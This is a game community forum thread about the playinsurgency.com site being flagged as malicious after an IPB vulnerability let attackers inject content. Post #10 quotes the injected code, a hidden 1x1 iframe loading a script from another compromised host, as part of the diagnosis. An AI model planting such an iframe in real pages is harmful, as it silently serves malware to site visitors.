#1
FYI

 

https://safebrowsing.google.com/safebrow...om/forums/

 

<p class=""> 

Quote: 

<p class="">What is the current listing status for playinsurgency.com/forums?

<blockquote>
Site is listed as suspicious - visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.
 

</blockquote>
Quote: 
 

[Image: r3m.jpg]

 

[Image: b_350_20_888888_181818_FFFF00_000000.png]

 

[Image: b_350_20_888888_181818_FFFF00_000000.png]

 

[Image: b_350_20_888888_181818_FFFF00_000000.png]
Reply
#2
Firefox warns me every time I open 'playinsurgency.com'.

https://www.stopbadware.org/firefox?hl=d...Findex.php
Reply
#3
This needs to be addressed.  I operate about 30 sites and am no stranger to having a site hacked.  You clean up the site, repair the damage and then make a public statement on the site so people can take proper precautions.


Has the malware been cleaned from the site?  Steve, you need to address this issue in the Steam forums.  Lets face it, who is going to buy a game with a hacked website.  

 

I took a chance overriding Chrome's security just to get in and as soon as I leave I will run Malwarebytes and AVG both to make sure I haven't picked anything up.

[Image: mike.gif]
[Image: b_350_20_692108_381007_FFFFFF_000000.png]
[Image: b_350_20_692108_381007_FFFFFF_000000.png]
Reply
#4
I'd be interested to see what the malware was and how it was delivered. Was it a third party advertisement or something? Or was it an actual hack that put malware on the site itself?

Reply
#5
my money is one of the many links in peoples sigs being hosted on a hacked site.

 

i mean how many bots get accepted?

 

but as said, don't look good :/

Reply
#6
The version of IPB we were using had a vulnerability in it and it has now been patched. There was a poison iframe injected onto the page (which could be identified by the bar at the top not being snug with the top of the page) that was attempting to serve malware.

 

If you accessed the site at all within the towards the end of last week or over the weekend it would be worth running a virus scan, disabling Java in the browser altogether and making everything else click to play.

Reply
#7
Its back again today...

[Image: r3m.jpg]

 

[Image: b_350_20_888888_181818_FFFF00_000000.png]

 

[Image: b_350_20_888888_181818_FFFF00_000000.png]

 

[Image: b_350_20_888888_181818_FFFF00_000000.png]
Reply
#8
confirmed

[Image: b_350_20_692108_381007_FFFFFF_000000.png]

 
Reply
#9
No malware is present on the site since it started appearing. A couple of days ago I did notice another iframe had been injected and turns out an admin account was being logged into from a Russian IP address (always the same one) but that was dealt with pretty quickly.

Reply
#10
Its still there, do a scan via:

 

http://quttera.com/detailed_report/www.p...rgency.com

 

Look in index.html, <strong>/# and <strong>/#close </strong></strong>for:

<pre class="_prettyXprint">
[[<iframe src="http://desiXXXXXXdern.com/wp-content/plugins/wp_module/index.php?out=1416931636" width="1" height="1" frameborder="0">]]</pre>
http://sitecheck.sucuri.net/results/www....rgency.com

 

https://www.virustotal.com/de/url/ac79ce...417775869/

 

 

[Image: r3m.jpg]

 

[Image: b_350_20_888888_181818_FFFF00_000000.png]

 

[Image: b_350_20_888888_181818_FFFF00_000000.png]

 

[Image: b_350_20_888888_181818_FFFF00_000000.png]
Reply




Users browsing this thread: 1 Guest(s)